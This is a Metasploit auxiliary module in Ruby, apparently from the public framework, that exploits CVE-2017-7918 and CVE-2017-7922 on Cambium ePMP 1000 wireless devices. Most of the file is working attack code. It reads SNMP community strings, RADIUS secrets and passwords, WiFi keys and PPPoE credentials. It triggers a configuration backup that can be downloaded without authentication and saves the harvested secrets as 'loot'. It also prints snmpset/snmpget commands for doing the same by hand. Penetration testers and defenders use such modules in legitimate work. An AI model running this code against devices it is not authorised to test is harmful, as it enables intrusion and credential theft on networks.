modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cambium ePMP 1000 SNMP Enumeration',
'Description' => %{
Cambium devices (ePMP, PMP, Force, & others) can be administered using
SNMP. The device configuration contains IP addresses, keys, and passwords,
amongst other information. This module uses SNMP to extract Cambium ePMP device
configuration. On certain software versions, specific device configuration
values can be accessed using SNMP RO string, even though only SNMP RW string
should be able to access them, according to MIB documentation. The module also
triggers full configuration backup, and retrieves the backup url. The
configuration file can then be downloaded without authentication. The module
has been tested on Cambium ePMP versions 3.5 & prior.
},
'References' =>
[
['URL', 'https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/'],
['CVE', '2017-7918'],
['CVE', '2017-7922']
],
'Author' => ['Karn Ganeshen'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
begin
snmp = connect_snmp
epmp_info = ''
# System Info
snmp_systemname = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.3.0')
snmp_systemdescription = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.4.0')
system_uptime = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.4.0')
uboot_version = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.14.0')
epmp_info << "SNMP System Name: #{snmp_systemname}" << "\n"
epmp_info << "SNMP System Description: #{snmp_systemdescription}" << "\n"
epmp_info << "Device UpTime: #{system_uptime}" << "\n"
epmp_info << "U-boot version: #{uboot_version}" << "\n"
# SNMP Info
snmp_readonly_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.1.0')
snmp_readwrite_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.2.0')
snmp_trap_community = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.6.0')
snmp_trap_entryip = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.7.1.2.0')
epmp_info << "SNMP read-only community name: #{snmp_readonly_community}" << "\n"
epmp_info << "SNMP read-write community name: #{snmp_readwrite_community}" << "\n"
epmp_info << "SNMP Trap Community: #{snmp_trap_community}" << "\n"
epmp_info << "SNMP Trap Server IP Address: #{snmp_trap_entryip}" << "\n"
# WIFI Radius Info
wireless_radius_serverinfo = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.5.0')
wireless_radius_serverport = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.3.0')
wireless_radius_serversecret = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.4.0')
wireless_radius_username = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.8.0')
wireless_radius_password = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.9.0')
epmp_info << "RADIUS server info: #{wireless_radius_serverinfo}" << "\n"
epmp_info << "RADIUS server port: #{wireless_radius_serverport}" << "\n"
epmp_info << "RADIUS server secret: #{wireless_radius_serversecret}" << "\n"
epmp_info << "Wireless Radius Username: #{wireless_radius_username}" << "\n"
epmp_info << "Wireless Radius Password: #{wireless_radius_password}" << "\n"
# WIFI Info
wireless_interface_ssid = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.2.0')
wireless_interface_encryptionkey = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.4.0')
wireless_interface_encryption = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.3.0')
epmp_info << "Wireless Interface SSID: #{wireless_interface_ssid}" << "\n"
epmp_info << "Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}" << "\n"
epmp_info << "Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption}" << "\n"
# Network PPPoE config
network_wan_pppoeservice = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.13.0')
network_wan_pppoeusername = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.10.0')
network_wan_pppoepassword = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.11.0')
epmp_info << "Network PPPoE Service Name: #{network_wan_pppoeservice}" << "\n"
epmp_info << "Network PPPoE Username: #{network_wan_pppoeusername}" << "\n"
epmp_info << "Network PPPoE Password: #{network_wan_pppoepassword}" << "\n"
# Printing captured info
print_status("Fetching System Information...\n")
print_good("#{ip}")
print_good("SNMP System Name: #{snmp_systemname}")
print_good("SNMP System Description: #{snmp_systemdescription}")
print_good("Device UpTime: #{system_uptime}")
print_good("U-boot version: #{uboot_version} \n")
print_status("Fetching SNMP Information...\n")
print_good("SNMP read-only community name: #{snmp_readonly_community}")
print_good("SNMP read-write community name: #{snmp_readwrite_community}")
print_good("SNMP Trap Community: #{snmp_trap_community}")
print_good("SNMP Trap Server IP Address: #{snmp_trap_entryip} \n")
print_status("Fetching WIFI Information...\n")
print_good("Wireless Interface SSID: #{wireless_interface_ssid}")
print_good("Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}")
print_good("Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption} \n")
print_status("Fetching WIFI Radius Information...\n")
print_good("RADIUS server info: #{wireless_radius_serverinfo}")
print_good("RADIUS server port: #{wireless_radius_serverport}")
print_good("RADIUS server secret: #{wireless_radius_serversecret}")
print_good("Wireless Radius Username: #{wireless_radius_username}")
print_good("Wireless Radius Password: #{wireless_radius_password} \n")
print_status("Fetching Network PPPoE Information...\n")
print_good("Network PPPoE Service Name: #{network_wan_pppoeservice}")
print_good("Network PPPoE Username: #{network_wan_pppoeusername}")
print_good("Network PPPoE Password: #{network_wan_pppoepassword} \n")
# set request
backup_oid = '1.3.6.1.4.1.17713.21.6.4.10.0'
enable_backup = '1'
varbind = SNMP::VarBind.new(backup_oid, SNMP::OctetString.new(enable_backup))
snmp.set(varbind)
backup_location_oid = '1.3.6.1.4.1.17713.21.6.4.13.0'
backup_location = snmp.get_value(backup_location_oid)
if @backup_location.present? == false
print_status('Backup needs to triggered manually. Run the following commands:')
print_status(" snmpset -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.10.0 i 1")
print_status(" snmpget -c <SNMP-RW-string> -v 1 #{datastore['RHOST']} 1.3.6.1.4.1.17713.21.6.4.13.0 \n")
else
print_good("Configuration backed-up for direct download at: #{backup_location}")
end
# Woot we got loot.
loot_name = 'snmp_loot'
loot_type = 'text/plain'
loot_filename = 'epmp1000_snmp_loot.txt'
loot_desc = 'Cambium ePMP configuration data'
p = store_loot(loot_name, loot_type, datastore['RHOST'], epmp_info, loot_filename, loot_desc)
print_good("Cambium ePMP loot saved at #{p}")
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::InvalidIpAddress
print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
elog(e)
ensure
disconnect_snmp
end
end
end